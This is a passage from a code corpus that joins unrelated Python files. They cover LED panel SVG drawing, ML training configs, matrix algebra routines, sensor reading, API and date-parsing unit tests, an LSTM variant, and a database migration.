circle = dwg.circle(center=pos, r=LED_SIZE/2, fill=color)
ledLayer.add(circle)
circle = dwg.circle(center=pos, r=LED_SIZE/2, stroke=COLOR_CUT,
stroke_width=0.2, fill="none")
cutLayer.add(circle)
circle = dwg.circle(center=pos, r=LED_SIZE/2+LED_MARGIN, stroke=COLOR_ENGRAVE,
stroke_width=0.2, fill="none")
cutLayer.add(circle)
circle = dwg.circle(center=pos, r=LED_SIZE/2, stroke="none",
stroke_width=0.2, fill="white")
self._panel._tLayer.add(circle)
return super().paint()
def searchLed(panel,pos=Point(0,0)) -> Led:
pos = pos.toCoords()
for obj in panel._paintable:
if isinstance(obj,Led):
if pos == obj._pos.toCoords():
return obj
return None |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
network config setting, will be used in train.py and eval.py
"""
from easydict import EasyDict as ed
config = ed({
"num_classes": 1000,
"batch_size": 128,
"epoch_size": 500,
"warmup_epochs": 20,
"lr_init": 0.1,
"lr_max": 0.4,
'lr_end': 1e-6,
'lr_decay_mode': 'cosine',
"momentum": 0.9,
"weight_decay": 4e-5,
"label_smooth": 0.1,
"loss_scale": 128,
"use_label_smooth": True,
"label_smooth_factor": 0.1,
"save_checkpoint": True,
"save_checkpoint_epochs": 20,
"keep_checkpoint_max": 10,
"save_checkpoint_path": "./",
})
|
# Copyright (c) 2019 Thomas Howe
from typing import List, Union
from problem_sets.static.data import data_manager
from problem_sets.static.data.sqlite.test import sqlite_test_util
def clean_start(tables: Union[str, List[str]]):
sqlite_test_util.clean_start(tables)
data_manager.initialize() |
def limpar():
'''==>> Clears the terminal.'''
import os
os.system('cls') or None
def leiaInt(txt):
ok = False
valor = 0
while True:
num = input(txt)
if num.isnumeric():
valor = int(num)
ok = True
else:
print('\033[1;31mERROR. Please enter a valid integer.\033[m')
if ok:
break
return valor
def fatorial(num, show=False):
"""--> Calcula o fatorial de um número.
num: número a ser calculado
show: (opcional) Mostrar ou não a conta.
"""
if not show:
fat = 1
n = num
while num >= 1:
fat = fat*num
num -= 1
print(f'Factorial of {n}: {fat}')
else:
print(f'{num}! = ',end='')
fat = 1
while num >= 1:
fat *= num
print(f'{num}', end=' ')
print('x' if num > 1 else '=', end=' ')
num -= 1
print(fat)
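if __name__ == '__main__':
    # Small demonstration added for clarity (not part of the original module):
    # fatorial(5) prints the factorial of 5 (120); with show=True it also prints
    # the expanded multiplication (5! = 5 x 4 x 3 x 2 x 1 = 120).
    fatorial(5)
    fatorial(5, show=True)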
|
biscuits_per_worker = int(input())
workers = int(input())
competitor_biscuits = int(input())
production_for_month = 0
daily_production = biscuits_per_worker * workers
production_for_month += daily_production * 20
for i in range(0, 10):
production_for_month += int((biscuits_per_worker * workers) * 0.75)
print(f"You have produced {int(production_for_month)} biscuits for the past month.")
if production_for_month > competitor_biscuits:
percentage = ((production_for_month - competitor_biscuits) / competitor_biscuits) * 100
print(f"You produce {percentage:.2f} percent more biscuits.")
elif production_for_month < competitor_biscuits:
percentage = ((competitor_biscuits - production_for_month) / competitor_biscuits) * 100
print(f"You produce {(percentage):.2f} percent less biscuits.")
|
#!/bin/python
import boto
from boto.sqs.message import RawMessage
import json
import os
import sys
data = {
"project": os.environ["CIRCLE_PROJECT_REPONAME"],
"sha": os.environ["CIRCLE_SHA1"][:7]
}
branch = os.environ["CIRCLE_BRANCH"]
if branch == "release":
queue_name = os.environ["SQS_NAME_PROD"]
elif branch == "master":
queue_name = os.environ["SQS_NAME_STAGING"]
else:
sys.exit(0)
sqs = boto.connect_sqs()
q = sqs.create_queue(queue_name)
m = RawMessage()
m.set_body(json.dumps(data))
q.write(m)
|
#!/usr/bin/env python3
from csv import DictReader
def parse_weather(file_: str):
with open(file_, 'r') as f:
reader = DictReader(f)
for row in reader:
print(row['SiteName'],row['Temperature'],row['Weather'])
if __name__ == '__main__':
parse_weather('weather.csv')
|
################################ A Library of Functions ##################################
##################################################################################################
#simple function which displays a matrix
def matrixDisplay(M):
for i in range(len(M)):
for j in range(len(M[i])):
print((M[i][j]), end = " ")
print()
##################################################################################################
#matrix product
def matrixProduct(L, M):
if len(L[0]) != len(M): #ensuring the plausibility
print("Matrix multiplication not possible.")
else:
print("Multiplying the two matrices: ")
P=[[0 for i in range(len(M[0]))] for j in range(len(L))] #initializing empty matrix
for i in range(len(L)): #iterating rows
for j in range(len(M[0])): #iterating columns
for k in range(len(M)): #iterating elements and substituing them
P[i][j] = P[i][j] + (L[i][k] * M[k][j])
matrixDisplay(P)
##################################################################################################
#the gauss-jordan elimination code
def gaussj(a, b):
n = len(b) #defining the range through which the loops will run
for k in range(n): #loop to index pivot rows and eliminated columns
#partial pivoting
if abs(a[k][k]) < 1.0e-12:
for i in range(k+1, n):
if abs(a[i][k]) > abs(a[k][k]):
for j in range(k, n):
a[k][j], a[i][j] = a[i][j], a[k][j] #swapping of rows
b[k], b[i] = b[i], b[k]
break
#division of the pivot row
pivot = a[k][k]
if pivot == 0:
print("There is no unique solution to this system of equations.")
return
for j in range(k, n): #index of columns of the pivot row
a[k][j] /= pivot
b[k] /= pivot
#elimination loop
for i in range(n): #index of subtracted rows
if i == k or a[i][k] == 0: continue
factor = a[i][k]
for j in range(k, n): #index of columns for subtraction
a[i][j] -= factor * a[k][j]
b[i] -= factor * b[k]
print(b)
#################################################################################################
#calculation of determinant using gauss-jordan elimination
def determinant(a):
n = len(a) #defining the range through which the loops will run
if n != len(a[0]): #checking if determinant is possible to calculate
print("The matrix must be a square matrix.")
else:
s = 0
#code to obtain row echelon matrix using partial pivoting
for k in range(n-1):
if abs(a[k][k]) < 1.0e-12:
for i in range(k+1, n):
if abs(a[i][k]) > abs(a[k][k]):
for j in range(k, n):
a[k][j], a[i][j] = a[i][j], a[k][j] #swapping
s = s + 1 #counting the number of swaps happened
for i in range(k+1, n):
if a[i][k] == 0: continue
factor = a[i][k]/a[k][k]
for j in range(k, n):
a[i][j] = a[i][j] - factor * a[k][j]
d = 1
for i in range(len(a)):
d = d * a[i][i] #enlisting the diagonal elements
d = d*(-1)**s
print(d)
#################################################################################################
#calculating inverse
def inverse(a):
n = len(a) #defining the range through which loops will run
#constructing the n X 2n augmented matrix
P = [[0.0 for i in range(len(a))] for j in range(len(a))]
for i in range(n): #identity matrix of the same size as a
P[i][i] = 1.0
for i in range(len(a)):
a[i].extend(P[i])
#main loop for gaussian elimination begins here
for k in range(n):
if abs(a[k][k]) < 1.0e-12:
for i in range(k+1, n):
if abs(a[i][k]) > abs(a[k][k]):
for j in range(k, 2*n):
a[k][j], a[i][j] = a[i][j], a[k][j] #swapping of rows
break
pivot = a[k][k] #defining the pivot
if pivot == 0: #checking if matrix is invertible
print("This matrix is not invertible.")
return
else:
for j in range(k, 2*n): #index of columns of the pivot row
a[k][j] /= pivot
for i in range(n): #index the subtracted rows
if i == k or a[i][k] == 0: continue
factor = a[i][k]
for j in range(k, 2*n): #index the columns for subtraction
a[i][j] -= factor * a[k][j]
for i in range(len(a)): #displaying the matrix
for j in range(n, len(a[0])):
print("{:.2f}".format(a[i][j]), end = " ") #printing upto 2 places in decimal.
print()
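if __name__ == "__main__":
    # Small self-check added for illustration (hypothetical 2x2 system, not part of
    # the original library). Copies are passed because the routines modify their
    # arguments in place.
    A = [[2.0, 1.0], [1.0, 3.0]]
    b = [3.0, 5.0]
    matrixProduct([row[:] for row in A], [[1.0], [2.0]])  # prints the 2x1 product
    determinant([row[:] for row in A])                    # prints 5.0
    gaussj([row[:] for row in A], b[:])                   # prints the solution (x ~ 0.8, y ~ 1.4)
    inverse([row[:] for row in A])                        # prints the 2x2 inverse to 2 decimal places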
|
import os
class GetSensorTmp():
def __init__(self, sensorID):
self.sensorID = sensorID
self.sensorFile = '/sys/bus/w1/devices/{0}/w1_slave'.format(self.sensorID)
if not os.path.isfile(self.sensorFile):
raise IOError('sensor is not found.')
def get(self):
with open(self.sensorFile, 'r') as sensorFile:
sensorData = sensorFile.read()
sensorDataSplit = sensorData.split('=')
tmpStr = sensorDataSplit[-1].replace('\n','')
if tmpStr == '85000':
raise IOError('can not get sensor data.')
tmp = round(float(tmpStr) / 1000, 2)
return '{0:.2f}'.format(tmp)
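# Minimal usage sketch (added for clarity; the sensor ID below is a placeholder and the
# class only works where the 1-Wire sysfs interface /sys/bus/w1/devices is available):
#   sensor = GetSensorTmp('28-0000075e1234')
#   print(sensor.get())   # e.g. '23.06'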
|
""" Test for ESO GSP metadata """
import geopandas as gpd
import pandas as pd
import pytest
from nowcasting_dataset.data_sources.gsp.eso import (
get_gsp_metadata_from_eso,
get_gsp_shape_from_eso,
)
def test_get_gsp_metadata_from_eso():
"""
Test to get the gsp metadata from eso. This should take ~1 second.
"""
metadata = get_gsp_metadata_from_eso()
assert metadata["gsp_id"].is_unique == 1
assert isinstance(metadata, pd.DataFrame)
assert len(metadata) > 100
assert "gnode_name" in metadata.columns
assert "gnode_lat" in metadata.columns
assert "gnode_lon" in metadata.columns
def test_get_pv_gsp_shape():
"""
Test to get the gsp shapes from eso. This should take ~1 second.
"""
gsp_shapes = get_gsp_shape_from_eso()
assert gsp_shapes["RegionID"].is_unique
assert isinstance(gsp_shapes, gpd.GeoDataFrame)
assert "RegionID" in gsp_shapes.columns
assert "RegionName" in gsp_shapes.columns
assert "geometry" in gsp_shapes.columns
def test_get_pv_gsp_shape_duplicates():
"""
Test to get the gsp shapes from eso. This should take ~1 second.
Do not remove duplicate region entries.
"""
gsp_shapes = get_gsp_shape_from_eso(join_duplicates=False)
assert gsp_shapes["RegionID"].is_unique is False
assert isinstance(gsp_shapes, gpd.GeoDataFrame)
assert "RegionID" in gsp_shapes.columns
assert "RegionName" in gsp_shapes.columns
assert "geometry" in gsp_shapes.columns
@pytest.mark.skip("Skip this for the moment as not needed for CI")
def test_get_pv_gsp_shape_from_eso():
"""
Test to get the gsp shapes from eso. This should take ~1 second.
"""
gsp_shapes = get_gsp_shape_from_eso(load_local_file=False)
assert gsp_shapes["RegionID"].is_unique
assert isinstance(gsp_shapes, gpd.GeoDataFrame)
assert "RegionID" in gsp_shapes.columns
assert "RegionName" in gsp_shapes.columns
assert "geometry" in gsp_shapes.columns
|
import sqlparser
from sqlparser import ENodeType
# Translates a node_type ID into a string
def translate_node_type(node_type):
for k, v in ENodeType.__dict__.items():
if v == node_type:
return k
return None
# Print node and traverse recursively
def process_node(node, depth=0, name='root'):
# print attributes like ints and strings
if not isinstance(node, sqlparser.Node):
print "%s%s: '%s'" % (" " * depth, name, str(node))
return
# print node attribute
if node is not None and isinstance(node, sqlparser.Node):
print "%s%s: %s (%d), text: '%s'" % (" " * depth, name, translate_node_type(node.node_type), node.node_type, node.get_text())
# Go through the list (if the current node is a list)
if node.node_type == ENodeType.list:
for i, subnode in enumerate(node.list):
process_node(subnode, depth + 1, 'list_item#%s' % i)
return
# Iterate through all attributes
for k,v in node.__dict__.items():
process_node(v, depth + 1, k)
parser = sqlparser.Parser(vendor=0)
query = "SELECT a, b, c FROM tbl1 WHERE d IN (1,2,3)"
parser.check_syntax(query)
stmt = parser.get_statement(0)
root = stmt.get_root()
process_node(root)
|
import configparser
import os
import unittest
import unittest.mock as mock
from requests import exceptions
from gras.github.github import GithubInterface
from gras.utils import to_iso_format
class TestGithubInterface(unittest.TestCase):
def setUp(self):
parser = configparser.ConfigParser()
parser.read_file(open(os.path.dirname(os.path.abspath(__file__)) + "/data/test_config.ini"))
self.github_token = parser.get("GITHUB", "github_token")
self.name = parser.get("GITHUB", "name")
self.owner = parser.get("GITHUB", "owner")
self.start_date = to_iso_format(parser.get("GITHUB", "start_date"))
self.end_date = to_iso_format(parser.get("GITHUB", "end_date"))
self.url = f"https://api.github.com/search/commits?q=repo:{self.owner}/" \
f"{self.name}+merge:false+committer-date:{self.start_date}.." \
f"{self.end_date}+sort:committer-date-asc&per_page=1&page=1"
@mock.patch('gras.query_engine.github.GithubInterface')
def test_send_request_via_url_if_accept_header(self, mock_request):
mock_request.return_value.status_code = 200
github = GithubInterface(
url=f"https://api.github.com/search/commits?q=repo:{self.owner}/{self.name}+merge:false+"
f"committer-date:{self.start_date}..{self.end_date}+sort:committer-date-asc&per_page=1&page=1",
additional_headers=dict(Accept="application/vnd.github.cloak-preview+json")
)
response = github.iterator()
self.assertTrue(response.status_code)
@mock.patch('gras.query_engine.github.GithubInterface')
def test_send_request_via_url_if_no_accept_header(self, mock_request):
mock_request.return_value.side_effect = f"Problem with getting data via url {self.url}."
github = GithubInterface(
url=self.url
)
try:
github.iterator()
except exceptions.RequestException as e:
self.assertTrue(e)
|
# -*- coding: utf-8 -*-
from __future__ import print_function, division
import math
import torch
from torch.nn import Module
from torch.nn.parameter import Parameter
from torch.nn.utils.rnn import PackedSequence
import torch.nn.functional as F
class LSTMHardSigmoid(Module):
def __init__(self, input_size, hidden_size,
num_layers=1, bias=True, batch_first=False,
dropout=0, bidirectional=False):
super(LSTMHardSigmoid, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.num_layers = num_layers
self.bias = bias
self.batch_first = batch_first
self.dropout = dropout
self.dropout_state = {}
self.bidirectional = bidirectional
num_directions = 2 if bidirectional else 1
gate_size = 4 * hidden_size
self._all_weights = []
for layer in range(num_layers):
for direction in range(num_directions):
layer_input_size = input_size if layer == 0 else hidden_size * num_directions
w_ih = Parameter(torch.Tensor(gate_size, layer_input_size))
w_hh = Parameter(torch.Tensor(gate_size, hidden_size))
b_ih = Parameter(torch.Tensor(gate_size))
b_hh = Parameter(torch.Tensor(gate_size))
layer_params = (w_ih, w_hh, b_ih, b_hh)
suffix = '_reverse' if direction == 1 else ''
param_names = ['weight_ih_l{}{}', 'weight_hh_l{}{}']
if bias:
param_names += ['bias_ih_l{}{}', 'bias_hh_l{}{}']
param_names = [x.format(layer, suffix) for x in param_names]
for name, param in zip(param_names, layer_params):
setattr(self, name, param)
self._all_weights.append(param_names)
self.flatten_parameters()
self.reset_parameters()
def flatten_parameters(self):
"""Resets parameter data pointer so that they can use faster code paths.
Right now, this is a no-op since we don't use CUDA acceleration.
"""
self._data_ptrs = []
def _apply(self, fn):
ret = super(LSTMHardSigmoid, self)._apply(fn)
self.flatten_parameters()
return ret
def reset_parameters(self):
stdv = 1.0 / math.sqrt(self.hidden_size)
for weight in self.parameters():
weight.data.uniform_(-stdv, stdv)
def forward(self, input, hx=None):
is_packed = isinstance(input, PackedSequence)
if is_packed:
input, batch_sizes = input
max_batch_size = batch_sizes[0]
else:
batch_sizes = None
max_batch_size = input.size(0) if self.batch_first else input.size(1)
if hx is None:
num_directions = 2 if self.bidirectional else 1
hx = torch.autograd.Variable(input.data.new(self.num_layers *
num_directions,
max_batch_size,
self.hidden_size).zero_(), requires_grad=False)
hx = (hx, hx)
has_flat_weights = list(p.data.data_ptr() for p in self.parameters()) == self._data_ptrs
if has_flat_weights:
first_data = next(self.parameters()).data
assert first_data.storage().size() == self._param_buf_size
flat_weight = first_data.new().set_(first_data.storage(), 0, torch.Size([self._param_buf_size]))
else:
flat_weight = None
func = AutogradRNN(
self.input_size,
self.hidden_size,
num_layers=self.num_layers,
batch_first=self.batch_first,
dropout=self.dropout,
train=self.training,
bidirectional=self.bidirectional,
batch_sizes=batch_sizes,
dropout_state=self.dropout_state,
flat_weight=flat_weight
)
output, hidden = func(input, self.all_weights, hx)
if is_packed:
output = PackedSequence(output, batch_sizes)
return output, hidden
def __repr__(self):
s = '{name}({input_size}, {hidden_size}'
if self.num_layers != 1:
s += ', num_layers={num_layers}'
if self.bias is not True:
s += ', bias={bias}'
if self.batch_first is not False:
s += ', batch_first={batch_first}'
if self.dropout != 0:
s += ', dropout={dropout}'
if self.bidirectional is not False:
s += ', bidirectional={bidirectional}'
s += ')'
return s.format(name=self.__class__.__name__, **self.__dict__)
def __setstate__(self, d):
super(LSTMHardSigmoid, self).__setstate__(d)
self.__dict__.setdefault('_data_ptrs', [])
if 'all_weights' in d:
self._all_weights = d['all_weights']
if isinstance(self._all_weights[0][0], str):
return
num_layers = self.num_layers
num_directions = 2 if self.bidirectional else 1
self._all_weights = []
for layer in range(num_layers):
for direction in range(num_directions):
suffix = '_reverse' if direction == 1 else ''
weights = ['weight_ih_l{}{}', 'weight_hh_l{}{}', 'bias_ih_l{}{}', 'bias_hh_l{}{}']
weights = [x.format(layer, suffix) for x in weights]
if self.bias:
self._all_weights += [weights]
else:
self._all_weights += [weights[:2]]
@property
def all_weights(self):
return [[getattr(self, weight) for weight in weights] for weights in self._all_weights]
def AutogradRNN(input_size, hidden_size, num_layers=1, batch_first=False,
dropout=0, train=True, bidirectional=False, batch_sizes=None,
dropout_state=None, flat_weight=None):
cell = LSTMCell
if batch_sizes is None:
rec_factory = Recurrent
else:
rec_factory = variable_recurrent_factory(batch_sizes)
if bidirectional:
layer = (rec_factory(cell), rec_factory(cell, reverse=True))
else:
layer = (rec_factory(cell),)
func = StackedRNN(layer,
num_layers,
True,
dropout=dropout,
train=train)
def forward(input, weight, hidden):
if batch_first and batch_sizes is None:
input = input.transpose(0, 1)
nexth, output = func(input, hidden, weight)
if batch_first and batch_sizes is None:
output = output.transpose(0, 1)
return output, nexth
return forward
def Recurrent(inner, reverse=False):
def forward(input, hidden, weight):
output = []
steps = range(input.size(0) - 1, -1, -1) if reverse else range(input.size(0))
for i in steps:
hidden = inner(input[i], hidden, *weight)
# hack to handle LSTM
output.append(hidden[0] if isinstance(hidden, tuple) else hidden)
if reverse:
output.reverse()
output = torch.cat(output, 0).view(input.size(0), *output[0].size())
return hidden, output
return forward
def variable_recurrent_factory(batch_sizes):
def fac(inner, reverse=False):
if reverse:
return VariableRecurrentReverse(batch_sizes, inner)
else:
return VariableRecurrent(batch_sizes, inner)
return fac
def VariableRecurrent(batch_sizes, inner):
def forward(input, hidden, weight):
output = []
input_offset = 0
last_batch_size = batch_sizes[0]
hiddens = []
flat_hidden = not isinstance(hidden, tuple)
if flat_hidden:
hidden = (hidden,)
for batch_size in batch_sizes:
step_input = input[input_offset:input_offset + batch_size]
input_offset += batch_size
dec = last_batch_size - batch_size
if dec > 0:
hiddens.append(tuple(h[-dec:] for h in hidden))
hidden = tuple(h[:-dec] for h in hidden)
last_batch_size = batch_size
if flat_hidden:
hidden = (inner(step_input, hidden[0], *weight),)
else:
hidden = inner(step_input, hidden, *weight)
output.append(hidden[0])
hiddens.append(hidden)
hiddens.reverse()
hidden = tuple(torch.cat(h, 0) for h in zip(*hiddens))
assert hidden[0].size(0) == batch_sizes[0]
if flat_hidden:
hidden = hidden[0]
output = torch.cat(output, 0)
return hidden, output
return forward
def VariableRecurrentReverse(batch_sizes, inner):
def forward(input, hidden, weight):
output = []
input_offset = input.size(0)
last_batch_size = batch_sizes[-1]
initial_hidden = hidden
flat_hidden = not isinstance(hidden, tuple)
if flat_hidden:
hidden = (hidden,)
initial_hidden = (initial_hidden,)
hidden = tuple(h[:batch_sizes[-1]] for h in hidden)
for batch_size in reversed(batch_sizes):
inc = batch_size - last_batch_size
if inc > 0:
hidden = tuple(torch.cat((h, ih[last_batch_size:batch_size]), 0)
for h, ih in zip(hidden, initial_hidden))
last_batch_size = batch_size
step_input = input[input_offset - batch_size:input_offset]
input_offset -= batch_size
if flat_hidden:
hidden = (inner(step_input, hidden[0], *weight),)
else:
hidden = inner(step_input, hidden, *weight)
output.append(hidden[0])
output.reverse()
output = torch.cat(output, 0)
if flat_hidden:
hidden = hidden[0]
return hidden, output
return forward
def StackedRNN(inners, num_layers, lstm=False, dropout=0, train=True):
num_directions = len(inners)
total_layers = num_layers * num_directions
def forward(input, hidden, weight):
assert(len(weight) == total_layers)
next_hidden = []
if lstm:
hidden = list(zip(*hidden))
for i in range(num_layers):
all_output = []
for j, inner in enumerate(inners):
l = i * num_directions + j
hy, output = inner(input, hidden[l], weight[l])
next_hidden.append(hy)
all_output.append(output)
input = torch.cat(all_output, input.dim() - 1)
if dropout != 0 and i < num_layers - 1:
input = F.dropout(input, p=dropout, training=train, inplace=False)
if lstm:
next_h, next_c = zip(*next_hidden)
next_hidden = (
torch.cat(next_h, 0).view(total_layers, *next_h[0].size()),
torch.cat(next_c, 0).view(total_layers, *next_c[0].size())
)
else:
next_hidden = torch.cat(next_hidden, 0).view(
total_layers, *next_hidden[0].size())
return next_hidden, input
return forward
def LSTMCell(input, hidden, w_ih, w_hh, b_ih=None, b_hh=None):
"""
LSTMCell is a modified LSTM cell with hard sigmoid activation on the gates.
"""
hx, cx = hidden
gates = F.linear(input, w_ih, b_ih) + F.linear(hx, w_hh, b_hh)
ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1)
ingate = hard_sigmoid(ingate)
forgetgate = hard_sigmoid(forgetgate)
cellgate = F.tanh(cellgate)
outgate = hard_sigmoid(outgate)
cy = (forgetgate * cx) + (ingate * cellgate)
hy = outgate * F.tanh(cy)
return hy, cy
def hard_sigmoid(x):
"""
hard_sigmoid computes element-wise hard sigmoid of x.
"""
x = (0.2 * x) + 0.5
x = F.threshold(-x, -1, -1)
x = F.threshold(-x, 0, 0)
return x
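# Note added for clarity: the two threshold calls above are equivalent to clamping
# 0.2 * x + 0.5 into [0, 1] (i.e. torch.clamp(0.2 * x + 0.5, min=0, max=1)), the
# piecewise-linear "hard" approximation of the sigmoid applied to the gates in
# LSTMCell above.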
|
"""properly named delivery_location_uuid and delivery_location on Task
Revision ID: 4d2f69dc0c76
Revises: 94bf8e9e0043
Create Date: 2021-01-31 15:06:43.998809
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '4d2f69dc0c76'
down_revision = '94bf8e9e0043'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('location_type',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('label', sa.String(length=64), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.drop_constraint('address_uuid_key', 'address', type_='unique')
op.drop_column('address', 'uuid')
op.add_column('location', sa.Column('location_type_id', sa.Integer(), nullable=True))
op.create_foreign_key(None, 'location', 'location_type', ['location_type_id'], ['id'])
op.add_column('task', sa.Column('delivery_location_uuid', postgresql.UUID(as_uuid=True), nullable=True))
op.add_column('task', sa.Column('pickup_location_uuid', postgresql.UUID(as_uuid=True), nullable=True))
op.drop_constraint('task_saved_location_dropoff_uuid_fkey', 'task', type_='foreignkey')
op.drop_constraint('task_pickup_address_id_fkey', 'task', type_='foreignkey')
op.drop_constraint('task_saved_location_pickup_uuid_fkey', 'task', type_='foreignkey')
op.drop_constraint('task_dropoff_address_id_fkey', 'task', type_='foreignkey')
op.create_foreign_key(None, 'task', 'location', ['pickup_location_uuid'], ['uuid'])
op.create_foreign_key(None, 'task', 'location', ['delivery_location_uuid'], ['uuid'])
op.drop_column('task', 'pickup_address_id')
op.drop_column('task', 'dropoff_address_id')
op.drop_column('task', 'saved_location_pickup_uuid')
op.drop_column('task', 'saved_location_dropoff_uuid')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('task', sa.Column('saved_location_dropoff_uuid', postgresql.UUID(), autoincrement=False, nullable=True))
op.add_column('task', sa.Column('saved_location_pickup_uuid', postgresql.UUID(), autoincrement=False, nullable=True))
op.add_column('task', sa.Column('dropoff_address_id', sa.INTEGER(), autoincrement=False, nullable=True))
op.add_column('task', sa.Column('pickup_address_id', sa.INTEGER(), autoincrement=False, nullable=True))
op.drop_constraint(None, 'task', type_='foreignkey')
op.drop_constraint(None, 'task', type_='foreignkey')
op.create_foreign_key('task_dropoff_address_id_fkey', 'task', 'address', ['dropoff_address_id'], ['id'])
op.create_foreign_key('task_saved_location_pickup_uuid_fkey', 'task', 'location', ['saved_location_pickup_uuid'], ['uuid'])
op.create_foreign_key('task_pickup_address_id_fkey', 'task', 'address', ['pickup_address_id'], ['id'])
op.create_foreign_key('task_saved_location_dropoff_uuid_fkey', 'task', 'location', ['saved_location_dropoff_uuid'], ['uuid'])
op.drop_column('task', 'pickup_location_uuid')
op.drop_column('task', 'delivery_location_uuid')
op.drop_constraint(None, 'location', type_='foreignkey')
op.drop_column('location', 'location_type_id')
op.add_column('address', sa.Column('uuid', postgresql.UUID(), autoincrement=False, nullable=False))
op.create_unique_constraint('address_uuid_key', 'address', ['uuid'])
op.drop_table('location_type')
# ### end Alembic commands ###
|
lineMessage = "Printing Entire File"
print(lineMessage)
print("-" * len(lineMessage))
with open('test.txt') as file_object:
#contents = file_object.readlines()
contents = file_object.read()
print(contents)
print("\n")
lineMessage = "Printing Entire File Line by Line"
print(lineMessage)
print("-" * len(lineMessage))
with open('test.txt') as file_object:
line_num = 1
for line in file_object:
print("{} {}".format(line_num,line.rstrip()))
line_num += 1
# Write to file
try:
with open('drive-spces.txt', 'w') as file_object:
file_object.write("This is output from df command\n")
except:
print("File Issues")
|
# -*- coding: utf-8 -*-
# Copyright (c) 2020, Brandon Nielsen
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the BSD license. See the LICENSE file for details.
import datetime
import unittest
from aniso8601 import compat
from aniso8601.exceptions import (DayOutOfBoundsError, HoursOutOfBoundsError,
ISOFormatError, LeapSecondError,
MidnightBoundsError, MinutesOutOfBoundsError,
SecondsOutOfBoundsError,
WeekOutOfBoundsError, YearOutOfBoundsError)
from aniso8601.builders.python import PythonTimeBuilder
from aniso8601.utcoffset import UTCOffset
class TestPythonTimeBuilder(unittest.TestCase):
def test_build_date(self):
testtuples = (({'YYYY': '2013', 'MM': None, 'DD': None, 'Www': None,
'D': None, 'DDD': None},
datetime.date(2013, 1, 1)),
({'YYYY': '0001', 'MM': None, 'DD': None, 'Www': None,
'D': None, 'DDD': None},
datetime.date(1, 1, 1)),
({'YYYY': '1900', 'MM': None, 'DD': None, 'Www': None,
'D': None, 'DDD': None},
datetime.date(1900, 1, 1)),
({'YYYY': '1981', 'MM': '04', 'DD': '05', 'Www': None,
'D': None, 'DDD': None},
datetime.date(1981, 4, 5)),
({'YYYY': '1981', 'MM': '04', 'DD': None, 'Www': None,
'D': None, 'DDD': None},
datetime.date(1981, 4, 1)),
({'YYYY': '1981', 'MM': None, 'DD': None, 'Www': None,
'D': None, 'DDD': '095'},
datetime.date(1981, 4, 5)),
({'YYYY': '1981', 'MM': None, 'DD': None, 'Www': None,
'D': None, 'DDD': '365'},
datetime.date(1981, 12, 31)),
({'YYYY': '1980', 'MM': None, 'DD': None, 'Www': None,
'D': None, 'DDD': '366'},
datetime.date(1980, 12, 31)),
#Make sure we shift in zeros
({'YYYY': '1', 'MM': None, 'DD': None, 'Www': None,
'D': None, 'DDD': None},
datetime.date(1000, 1, 1)),
({'YYYY': '12', 'MM': None, 'DD': None, 'Www': None,
'D': None, 'DDD': None},
datetime.date(1200, 1, 1)),
({'YYYY': '123', 'MM': None, 'DD': None, 'Www': None,
'D': None, 'DDD': None},
datetime.date(1230, 1, 1)))
for testtuple in testtuples:
result = PythonTimeBuilder.build_date(**testtuple[0])
self.assertEqual(result, testtuple[1])
#Test weekday
testtuples = (({'YYYY': '2004', 'MM': None, 'DD': None, 'Www': '53',
'D': None, 'DDD': None},
datetime.date(2004, 12, 27), 0),
({'YYYY': '2009', 'MM': None, 'DD': None, 'Www': '01',
'D': None, 'DDD': None},
datetime.date(2008, 12, 29), 0),
({'YYYY': '2010', 'MM': None, 'DD': None, 'Www': '01',
'D': None, 'DDD': None},
datetime.date(2010, 1, 4), 0),
({'YYYY': '2009', 'MM': None, 'DD': None, 'Www': '53',
'D': None, 'DDD': None},
datetime.date(2009, 12, 28), 0),
({'YYYY': '2009', 'MM': None, 'DD': None, 'Www': '01',
'D': '1', 'DDD': None},
datetime.date(2008, 12, 29), 0),
({'YYYY': '2009', 'MM': None, 'DD': None, 'Www': '53',
'D': '7', 'DDD': None},
datetime.date(2010, 1, 3), 6),
({'YYYY': '2010', 'MM': None, 'DD': None, 'Www': '01',
'D': '1', 'DDD': None},
datetime.date(2010, 1, 4), 0),
({'YYYY': '2004', 'MM': None, 'DD': None, 'Www': '53',
'D': '6', 'DDD': None},
datetime.date(2005, 1, 1), 5))
for testtuple in testtuples:
result = PythonTimeBuilder.build_date(**testtuple[0])
self.assertEqual(result, testtuple[1])
self.assertEqual(result.weekday(), testtuple[2])
def test_build_date_bounds_checking(self):
#0 isn't a valid week number
with self.assertRaises(WeekOutOfBoundsError):
PythonTimeBuilder.build_date(YYYY='2003', Www='00')
#Week must not be larger than 53
with self.assertRaises(WeekOutOfBoundsError):
PythonTimeBuilder.build_date(YYYY='2004', Www='54')
#0 isn't a valid day number
with self.assertRaises(DayOutOfBoundsError):
PythonTimeBuilder.build_date(YYYY='2001', Www='02', D='0')
#Day must not be larger than 7
with self.assertRaises(DayOutOfBoundsError):
PythonTimeBuilder.build_date(YYYY='2001', Www='02', D='8')
#0 isn't a valid year for a Python builder
with self.assertRaises(YearOutOfBoundsError):
PythonTimeBuilder.build_date(YYYY='0000')
with self.assertRaises(DayOutOfBoundsError):
PythonTimeBuilder.build_date(YYYY='1981', DDD='000')
#Day 366 is only valid on a leap year
with self.assertRaises(DayOutOfBoundsError):
PythonTimeBuilder.build_date(YYYY='1981', DDD='366')
#Day must be 365 or 366, not larger
with self.assertRaises(DayOutOfBoundsError):
PythonTimeBuilder.build_date(YYYY='1981', DDD='367')
def test_build_time(self):
testtuples = (({}, datetime.time()),
({'hh': '12.5'},
